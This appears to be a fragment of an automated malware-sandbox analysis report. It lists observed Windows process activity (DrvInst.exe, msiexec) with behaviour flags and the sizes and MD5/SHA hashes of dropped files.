C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000060" "00000000000005A8"1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:652
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD54aca8d053a5f2d4f1304bed01cd88609
SHA19018177ee075a5a260a7e6f9b1dd91180b3e7bdf
SHA2568282941d0e99fbb637d91b750d0577f34274f878d803c498ec7b3d5544911520
SHA512d96455542a7efc68d8b2f46305d561a16a764c4d66e8ecbf187dfbfe24fed97fc30c7c3afef2bc40af42f9519a0f6f830959f0397e481c640a69b722d26fb390
-
Filesize
3.1MB
MD5db6688b70f3255877e15541970145e68
SHA15f69edadeb9e7dae7f4b034031cb325ce1c7f2bd
SHA256208f1f3a5928a4b6ea18e91bbbd33ad8d04273f067983e8e09490b1b8a12f7cb
SHA51272f588728035f844662381e928ed117134ce2bae1be1848204fc1bd753f37fbdfd4a683ff1454ef944643a51c2fe9944a651b2847428f8d15a1c6c026e0ecfce
-
Filesize
1.0MB
MD5f90ddf18d65bb3153bcdfdc4856ce2a5
SHA1611376391f17207d60ca8c2ec81354933f8dac45
SHA25662eef5a5e363624007bc29a6ecd3275aec2e5a67eef058df404d145c90e3a0ce
SHA512f3f20f216ab6fd055f8d494f2758512413cb1cf121a2b51cae4e7b371a595b4dfe8ed4213aa759ccc4569ad6ed792f936304bfb4aac2952a79a3b2bccd293316
-
Filesize
2.4MB
MD51b772652a5b64c119b00ec06c00311db
SHA1afeb3bfba34eccadce4d2141d6d59707c83e9583
SHA256c98f9a50e0240455ce52e01d4b4e94453438a5a5614c2d424bb485ce1db8fbd4
SHA5125cb2761839634a45c4047cbbe31fc30bf140829630d57104fc27fc770a68b2c7d8209181aba17ace9fe85a3f7b705467c14b2ddbc206aca3c3fd542e666f7882
-
Filesize
577KB
MD5c31c4b04558396c6fabab64dcf366534
SHA1fa836d92edc577d6a17ded47641ba1938589b09a
SHA2569d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
SHA512814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99
-
Filesize
2.4MB
MD5048cee96f68a4c516b3aa1a8a4781e46
SHA15582bb564630c5ead8704d06bcdb427dd9840de5
SHA256835e566ab875a5dd955882f57ea01cb2dcc5a82755821a6e951d6eb5a4005293
SHA5122bf13570a5c83b4912ed04759c082a24ba8e53ce0dfae74d80032c075f7a1bc55e47c29014bd71332ff87b5c1f2065259b4b24c285bcddc109263204a0f57c32